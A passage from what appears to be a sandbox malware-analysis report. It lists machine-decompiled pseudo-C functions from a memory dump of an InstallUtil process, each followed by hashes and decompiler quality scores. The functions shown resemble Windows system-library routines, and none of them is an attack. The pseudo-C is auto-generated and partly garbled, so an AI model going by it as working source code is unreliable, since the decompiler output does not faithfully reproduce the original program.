                      							_t68 =  *_t60;
                      							_t80 = _t60[1];
                      							 *(_t85 - 0x28) = _t68;
                      							 *(_t85 - 0x24) = _t80;
                      							while(1) {
                      								L10:
                      								__eflags = _t80;
                      								if(_t80 == 0) {
                      									break;
                      								}
                      								_t84 = _t68;
                      								 *(_t85 - 0x30) = _t80;
                      								 *(_t85 - 0x24) = _t80 - 1;
                      								asm("lock cmpxchg8b [edi]");
                      								_t68 = _t84;
                      								 *(_t85 - 0x28) = _t68;
                      								 *(_t85 - 0x24) = _t80;
                      								__eflags = _t68 - _t84;
                      								_t82 =  *((intOrPtr*)(_t85 + 8));
                      								if(_t68 != _t84) {
                      									continue;
                      								}
                      								__eflags = _t80 -  *(_t85 - 0x30);
                      								if(_t80 !=  *(_t85 - 0x30)) {
                      									continue;
                      								}
                      								__eflags = _t80;
                      								if(_t80 == 0) {
                      									break;
                      								}
                      								_t63 = 0;
                      								 *(_t85 - 0x34) = 0;
                      								_t84 = 0;
                      								__eflags = 0;
                      								while(1) {
                      									 *(_t85 - 0x3c) = _t84;
                      									__eflags = _t84 - 3;
                      									if(_t84 >= 3) {
                      										break;
                      									}
                      									__eflags = _t63;
                      									if(_t63 != 0) {
                      										L40:
                      										_t84 =  *_t63;
                      										__eflags = _t84;
                      										if(_t84 != 0) {
                      											_t84 =  *(_t84 + 4);
                      											__eflags = _t84;
                      											if(_t84 != 0) {
                      												 *0x13bb1e0(_t63, _t82);
                      												 *_t84();
                      											}
                      										}
                      										do {
                      											_t60 = _t82 + 8;
                      											 *(_t85 - 0x2c) = _t60;
                      											_t68 =  *_t60;
                      											_t80 = _t60[1];
                      											 *(_t85 - 0x28) = _t68;
                      											 *(_t85 - 0x24) = _t80;
                      											goto L10;
                      										} while (_t63 == 0);
                      										goto L40;
                      									}
                      									_t69 = 0;
                      									__eflags = 0;
                      									while(1) {
                      										 *(_t85 - 0x38) = _t69;
                      										__eflags = _t69 -  *0x13b84c0;
                      										if(_t69 >=  *0x13b84c0) {
                      											break;
                      										}
                      										__eflags = _t63;
                      										if(_t63 != 0) {
                      											break;
                      										}
                      										_t66 = E01399063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                      										__eflags = _t66;
                      										if(_t66 == 0) {
                      											_t63 = 0;
                      											__eflags = 0;
                      										} else {
                      											_t63 = _t66 + 0xfffffff4;
                      										}
                      										 *(_t85 - 0x34) = _t63;
                      										_t69 = _t69 + 1;
                      									}
                      									_t84 = _t84 + 1;
                      								}
                      								__eflags = _t63;
                      							}
                      							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                      							 *((char*)(_t82 + 0xe5)) = 1;
                      							 *((char*)(_t85 - 0x1d)) = 1;
                      							L12:
                      							 *(_t85 - 4) = 0xfffffffe;
                      							E012C922A(_t82);
                      							_t53 = E012E7D50();
                      							__eflags = _t53;
                      							if(_t53 != 0) {
                      								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      							} else {
                      								_t56 = 0x7ffe0386;
                      							}
                      							__eflags =  *_t56;
                      							if( *_t56 != 0) {
                      								_t56 = E01398B58(_t82);
                      							}
                      							__eflags =  *((char*)(_t85 - 0x1d));
                      							if( *((char*)(_t85 - 0x1d)) != 0) {
                      								__eflags = _t82 -  *0x13b86c0; // 0xe607b0
                      								if(__eflags != 0) {
                      									__eflags = _t82 -  *0x13b86b8; // 0x0
                      									if(__eflags == 0) {
                      										_t79 = 0x13b86bc;
                      										_t72 = 0x13b86b8;
                      										goto L18;
                      									}
                      									__eflags = _t56 | 0xffffffff;
                      									asm("lock xadd [edi], eax");
                      									if(__eflags == 0) {
                      										E012C9240(_t68, _t82, _t82, _t84, __eflags);
                      									}
                      								} else {
                      									_t79 = 0x13b86c4;
                      									_t72 = 0x13b86c0;
                      									L18:
                      									E012F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                      								}
                      							}
                      							goto L5;
                      						}
                      					}
                      				}
                      			}



















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a7497a574c1208a83ed067a28f48ccf09231eacdae597969d0cdc57f5972b3e
                      • Instruction ID: c48afdf6269f2f29b00e5c443ecf4699ddbb3e6cde39db8ed510ea8b2e512ba1
                      • Opcode Fuzzy Hash: 2a7497a574c1208a83ed067a28f48ccf09231eacdae597969d0cdc57f5972b3e
                      • Instruction Fuzzy Hash: 3A31E575A21246DFDF26DB6CC0897ACBBB5BB89B2CF14829DC70467241D3B4A9C0CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E012F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr* _v20;
                      				void* _t22;
                      				char _t23;
                      				void* _t36;
                      				intOrPtr _t42;
                      				intOrPtr _t43;
                      
                      				_v12 = __ecx;
                      				_t43 = 0;
                      				_v20 = __edx;
                      				_t42 =  *__edx;
                      				 *__edx = 0;
                      				_v16 = _t42;
                      				_push( &_v8);
                      				_push(0);
                      				_push(0);
                      				_push(6);
                      				_push(0);
                      				_push(__ecx);
                      				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                      				_push(_t36);
                      				_t22 = E012EF460();
                      				if(_t22 < 0) {
                      					if(_t22 == 0xc0000023) {
                      						goto L1;
                      					}
                      					L3:
                      					return _t43;
                      				}
                      				L1:
                      				_t23 = _v8;
                      				if(_t23 != 0) {
                      					_t38 = _a4;
                      					if(_t23 >  *_a4) {
                      						_t42 = L012E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                      						if(_t42 == 0) {
                      							goto L3;
                      						}
                      						_t23 = _v8;
                      					}
                      					_push( &_v8);
                      					_push(_t23);
                      					_push(_t42);
                      					_push(6);
                      					_push(_t43);
                      					_push(_v12);
                      					_push(_t36);
                      					if(E012EF460() < 0) {
                      						if(_t42 != 0 && _t42 != _v16) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                      						}
                      						goto L3;
                      					}
                      					 *_v20 = _t42;
                      					 *_a4 = _v8;
                      				}
                      				_t43 = 1;
                      				goto L3;
                      			}













                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                      • Instruction ID: 02a0a191082a85e2611c9f25c90c10611aecb395f95af2ecd56a5388a8e8c52d
                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                      • Instruction Fuzzy Hash: 3B21A132620119EFD725CF59CC84EABFBBDEF85A40F514069EB0597210D630AE11CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E01346C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                      				signed short* _v8;
                      				signed char _v12;
                      				void* _t22;
                      				signed char* _t23;
                      				intOrPtr _t24;
                      				signed short* _t44;
                      				void* _t47;
                      				signed char* _t56;
                      				signed char* _t58;
                      
                      				_t48 = __ecx;
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t44 = __ecx;
                      				_v12 = __edx;
                      				_v8 = __ecx;
                      				_t22 = E012E7D50();
                      				_t58 = 0x7ffe0384;
                      				if(_t22 == 0) {
                      					_t23 = 0x7ffe0384;
                      				} else {
                      					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      				}
                      				if( *_t23 != 0) {
                      					_t24 =  *0x13b7b9c; // 0x0
                      					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                      					_t23 = L012E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                      					_t56 = _t23;
                      					if(_t56 != 0) {
                      						_t56[0x24] = _a4;
                      						_t56[0x28] = _a8;
                      						_t56[6] = 0x1420;
                      						_t56[0x20] = _v12;
                      						_t14 =  &(_t56[0x2c]); // 0x2c
                      						E0130F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                      						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                      						if(E012E7D50() != 0) {
                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      						}
                      						_push(_t56);
                      						_push(_t47 - 0x20);
                      						_push(0x402);
                      						_push( *_t58 & 0x000000ff);
                      						E01309AE0();
                      						_t23 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                      					}
                      				}
                      				return _t23;
                      			}













                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4bc93f0b74522fb0104a926051273bc39641eb522bedd49b4150d02e8f96c36
                      • Instruction ID: bdabead817be7ef3562bed4e58f199183c3c15a122ad8079975031d3d312494f
                      • Opcode Fuzzy Hash: f4bc93f0b74522fb0104a926051273bc39641eb522bedd49b4150d02e8f96c36
                      • Instruction Fuzzy Hash: D2219AB1A00645AFDB15DF68D884F2AB7E8FF48704F040069F908C7791D635ED50CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E013090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                      				intOrPtr* _v0;
                      				void* _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				char _v36;
                      				void* _t38;
                      				intOrPtr _t41;
                      				void* _t44;
                      				signed int _t45;
                      				intOrPtr* _t49;
                      				signed int _t57;
                      				signed int _t58;
                      				intOrPtr* _t59;
                      				void* _t62;
                      				void* _t63;
                      				void* _t65;
                      				void* _t66;
                      				signed int _t69;
                      				intOrPtr* _t70;
                      				void* _t71;
                      				intOrPtr* _t72;
                      				intOrPtr* _t73;
                      				char _t74;
                      
                      				_t65 = __edx;
                      				_t57 = _a4;
                      				_t32 = __ecx;
                      				_v8 = __edx;
                      				_t3 = _t32 + 0x14c; // 0x14c
                      				_t70 = _t3;
                      				_v16 = __ecx;
                      				_t72 =  *_t70;
                      				while(_t72 != _t70) {
                      					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                      						L24:
                      						_t72 =  *_t72;
                      						continue;
                      					}
                      					_t30 = _t72 + 0x10; // 0x10
                      					if(E0131D4F0(_t30, _t65, _t57) == _t57) {
                      						return 0xb7;
                      					}
                      					_t65 = _v8;
                      					goto L24;
                      				}
                      				_t61 = _t57;
                      				_push( &_v12);
                      				_t66 = 0x10;
                      				if(E012FE5E0(_t57, _t66) < 0) {
                      					return 0x216;
                      				}
                      				_t73 = L012E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                      				if(_t73 == 0) {
                      					_t38 = 0xe;
                      					return _t38;
                      				}
                      				_t9 = _t73 + 0x10; // 0x10
                      				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                      				E0130F3E0(_t9, _v8, _t57);
                      				_t41 =  *_t70;
                      				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                      					_t62 = 3;
                      					asm("int 0x29");
                      					_push(_t62);
                      					_push(_t57);
                      					_push(_t73);
                      					_push(_t70);
                      					_t71 = _t62;
                      					_t74 = 0;
                      					_v36 = 0;
                      					_t63 = E012FA2F0(_t62, _t71, 1, 6,  &_v36);
                      					if(_t63 == 0) {
                      						L20:
                      						_t44 = 0x57;
                      						return _t44;
                      					}
                      					_t45 = _v12;
                      					_t58 = 0x1c;
                      					if(_t45 < _t58) {
                      						goto L20;
                      					}
                      					_t69 = _t45 / _t58;
                      					if(_t69 == 0) {
                      						L19:
                      						return 0xe8;
                      					}
                      					_t59 = _v0;
                      					do {
                      						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                      							goto L18;
                      						}
                      						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                      						 *_t59 = _t49;
                      						if( *_t49 != 0x53445352) {
                      							goto L18;
                      						}
                      						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                      						return 0;
                      						L18:
                      						_t63 = _t63 + 0x1c;
                      						_t74 = _t74 + 1;
                      					} while (_t74 < _t69);
                      					goto L19;
                      				}
                      				 *_t73 = _t41;
                      				 *((intOrPtr*)(_t73 + 4)) = _t70;
                      				 *((intOrPtr*)(_t41 + 4)) = _t73;
                      				 *_t70 = _t73;
                      				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                      				return 0;
                      			}



























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                      • Instruction ID: e440a65db7a8fa1039357c4cd6da4f021b9b92440be314bf4a237779e7a97fad
                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                      • Instruction Fuzzy Hash: 11218371A00209EFDB22DF59C444B6AFBF8EB58318F15846AE949A7651D370ED40CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E012F3B7A(void* __ecx) {
                      				signed int _v8;
                      				char _v12;
                      				intOrPtr _v20;
                      				intOrPtr _t17;
                      				intOrPtr _t26;
                      				void* _t35;
                      				void* _t38;
                      				void* _t41;
                      				intOrPtr _t44;
                      
                      				_t17 =  *0x13b84c4; // 0x0
                      				_v12 = 1;
                      				_v8 =  *0x13b84c0 * 0x4c;
                      				_t41 = __ecx;
                      				_t35 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13b84c0 * 0x4c);
                      				if(_t35 == 0) {
                      					_t44 = 0xc0000017;
                      				} else {
                      					_push( &_v8);
                      					_push(_v8);
                      					_push(_t35);
                      					_push(4);
                      					_push( &_v12);
                      					_push(0x6b);
                      					_t44 = E0130AA90();
                      					_v20 = _t44;
                      					if(_t44 >= 0) {
                      						E0130FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13b84c0 * 0xc);
                      						_t38 = _t35;
                      						if(_t35 < _v8 + _t35) {
                      							do {
                      								asm("movsd");
                      								asm("movsd");
                      								asm("movsd");
                      								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                      							} while (_t38 < _v8 + _t35);
                      							_t44 = _v20;
                      						}
                      					}
                      					_t26 =  *0x13b84c4; // 0x0
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                      				}
                      				return _t44;
                      			}













                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f10b8e6e6540bbf66f4cb80c471278e6284a556c2c8b7fde764904c7b54e5c9a
                      • Instruction ID: 29df72236bd0b3a48dae5c1f998df575d2b68a4f89f2a7192af3cb4519c82397
                      • Opcode Fuzzy Hash: f10b8e6e6540bbf66f4cb80c471278e6284a556c2c8b7fde764904c7b54e5c9a
                      • Instruction Fuzzy Hash: EE219F72A00109AFD715DF98DD81B6ABBBDFB44708F1500A8EA08EB251D375ED51CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E01346CF0(void* __edx, intOrPtr _a4, short _a8) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed char* _t21;
                      				void* _t24;
                      				void* _t36;
                      				void* _t38;
                      				void* _t46;
                      
                      				_push(_t36);
                      				_t46 = __edx;
                      				_v12 = 0;
                      				_v8 = 0;
                      				_v20 = 0;
                      				_v16 = 0;
                      				if(E012E7D50() == 0) {
                      					_t21 = 0x7ffe0384;
                      				} else {
                      					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                      				}
                      				if( *_t21 != 0) {
                      					_t21 =  *[fs:0x30];
                      					if((_t21[0x240] & 0x00000004) != 0) {
                      						if(E012E7D50() == 0) {
                      							_t21 = 0x7ffe0385;
                      						} else {
                      							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                      						}
                      						if(( *_t21 & 0x00000020) != 0) {
                      							_t56 = _t46;
                      							if(_t46 == 0) {
                      								_t46 = 0x12a5c80;
                      							}
                      							_push(_t46);
                      							_push( &_v12);
                      							_t24 = E012FF6E0(_t36, 0, _t46, _t56);
                      							_push(_a4);
                      							_t38 = _t24;
                      							_push( &_v28);
                      							_t21 = E012FF6E0(_t38, 0, _t46, _t56);
                      							if(_t38 != 0) {
                      								if(_t21 != 0) {
                      									E01347016(_a8, 0, 0, 0,  &_v36,  &_v28);
                      									L012E2400( &_v52);
                      								}
                      								_t21 = L012E2400( &_v28);
                      							}
                      						}
                      					}
                      				}
                      				return _t21;
                      			}




















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 866612f61212de37f5d8936fe905fcb0a8d3aaa4281a749733f3477889ffec3b
                      • Instruction ID: 7ca58c30673c7438d00056b2796c78fba5d0c9d391681d6326c449f311404aa6
                      • Opcode Fuzzy Hash: 866612f61212de37f5d8936fe905fcb0a8d3aaa4281a749733f3477889ffec3b
                      • Instruction Fuzzy Hash: B721C5B25043459FD711EF29C945F67BBECEF93644F040566FA80C7261EB34E948C6A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E0139070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                      				char _v8;
                      				intOrPtr _v11;
                      				signed int _v12;
                      				intOrPtr _v15;
                      				signed int _v16;
                      				intOrPtr _v28;
                      				void* __ebx;
                      				char* _t32;
                      				signed int* _t38;
                      				signed int _t60;
                      
                      				_t38 = __ecx;
                      				_v16 = __edx;
                      				_t60 = E013907DF(__ecx, __edx,  &_a4,  &_a8, 2);
                      				if(_t60 != 0) {
                      					_t7 = _t38 + 0x38; // 0x29cd5903
                      					_push( *_t7);
                      					_t9 = _t38 + 0x34; // 0x6adeeb00
                      					_push( *_t9);
                      					_v12 = _a8 << 0xc;
                      					_t11 = _t38 + 4; // 0x5de58b5b
                      					_push(0x4000);
                      					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                      					E0138AFDE( &_v8,  &_v12);
                      					E01391293(_t38, _v28, _t60);
                      					if(E012E7D50() == 0) {
                      						_t32 = 0x7ffe0380;
                      					} else {
                      						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      					}
                      					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                      						_t21 = _t38 + 0x3c; // 0xc3595e5f
                      						E013814FB(_t38,  *_t21, _v11, _v15, 0xd);
                      					}
                      				}
                      				return  ~_t60;
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                      • Instruction ID: fe36bb020c3b7c912cfb2caa94faa974ba1704a7f9f0a26a4487a8a3c6ede34c
                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                      • Instruction Fuzzy Hash: 4A210436204204AFDB09DF1CC884B6ABBA9EFD4364F048569F9959B381D730D909CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E01347794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _t21;
                      				void* _t24;
                      				intOrPtr _t25;
                      				void* _t36;
                      				short _t39;
                      				signed char* _t42;
                      				unsigned int _t46;
                      				void* _t50;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t21 =  *0x13b7b9c; // 0x0
                      				_t46 = _a8;
                      				_v12 = __edx;
                      				_v8 = __ecx;
                      				_t4 = _t46 + 0x2e; // 0x2e
                      				_t36 = _t4;
                      				_t24 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                      				_t50 = _t24;
                      				if(_t50 != 0) {
                      					_t25 = _a4;
                      					if(_t25 == 5) {
                      						L3:
                      						_t39 = 0x14b1;
                      					} else {
                      						_t39 = 0x14b0;
                      						if(_t25 == 6) {
                      							goto L3;
                      						}
                      					}
                      					 *((short*)(_t50 + 6)) = _t39;
                      					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                      					_t11 = _t50 + 0x2c; // 0x2c
                      					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                      					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                      					E0130F3E0(_t11, _a12, _t46);
                      					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                      					if(E012E7D50() == 0) {
                      						_t42 = 0x7ffe0384;
                      					} else {
                      						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      					}
                      					_push(_t50);
                      					_t19 = _t36 - 0x20; // 0xe
                      					_push(0x403);
                      					_push( *_t42 & 0x000000ff);
                      					E01309AE0();
                      					_t24 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                      				}
                      				return _t24;
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8ed2c3afc682b26669964d126f792448c20bf27661dc3b1cdc8eba2e323f79ab
                      • Instruction ID: 2ebcb05cf37b89a4ee739979c763c2d4b1e651db71613c2bd3548d7d7ea3dcac
                      • Opcode Fuzzy Hash: 8ed2c3afc682b26669964d126f792448c20bf27661dc3b1cdc8eba2e323f79ab
                      • Instruction Fuzzy Hash: 0C219D72900604AFD725DF69D894E6BBBE8EF88344F100569EA0AD7690E734E900CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E012EAE73(intOrPtr __ecx, void* __edx) {
                      				intOrPtr _v8;
                      				void* _t19;
                      				char* _t22;
                      				signed char* _t24;
                      				intOrPtr _t25;
                      				intOrPtr _t27;
                      				void* _t31;
                      				intOrPtr _t36;
                      				char* _t38;
                      				signed char* _t42;
                      
                      				_push(__ecx);
                      				_t31 = __edx;
                      				_v8 = __ecx;
                      				_t19 = E012E7D50();
                      				_t38 = 0x7ffe0384;
                      				if(_t19 != 0) {
                      					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      				} else {
                      					_t22 = 0x7ffe0384;
                      				}
                      				_t42 = 0x7ffe0385;
                      				if( *_t22 != 0) {
                      					if(E012E7D50() == 0) {
                      						_t24 = 0x7ffe0385;
                      					} else {
                      						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      					}
                      					if(( *_t24 & 0x00000010) != 0) {
                      						goto L17;
                      					} else {
                      						goto L3;
                      					}
                      				} else {
                      					L3:
                      					_t27 = E012E7D50();
                      					if(_t27 != 0) {
                      						_t27 =  *[fs:0x30];
                      						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                      					}
                      					if( *_t38 != 0) {
                      						_t27 =  *[fs:0x30];
                      						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                      							goto L5;
                      						}
                      						_t27 = E012E7D50();
                      						if(_t27 != 0) {
                      							_t27 =  *[fs:0x30];
                      							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                      						}
                      						if(( *_t42 & 0x00000020) != 0) {
                      							L17:
                      							_t25 = _v8;
                      							_t36 = 0;
                      							if(_t25 != 0) {
                      								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                      							}
                      							_t27 = E01347794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                      						}
                      						goto L5;
                      					} else {
                      						L5:
                      						return _t27;
                      					}
                      				}
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                      • Instruction ID: 4efd6540477eda12d9dc1cbeebc64eef23e4f5a38766236bd32638b83726a2de
                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                      • Instruction Fuzzy Hash: 0621D472611685DFEB269B2DC948B367BE8EF84254F0900A0ED048B692D7B5DC40C694
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E012FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				void* _t19;
                      				intOrPtr _t29;
                      				intOrPtr _t32;
                      				intOrPtr _t35;
                      				intOrPtr _t37;
                      				intOrPtr* _t40;
                      
                      				_t35 = __edx;
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t37 = 0;
                      				_v8 = __edx;
                      				_t29 = __ecx;
                      				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                      					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                      					L3:
                      					_t19 = _a4 - 4;
                      					if(_t19 != 0) {
                      						if(_t19 != 1) {
                      							L7:
                      							return _t37;
                      						}
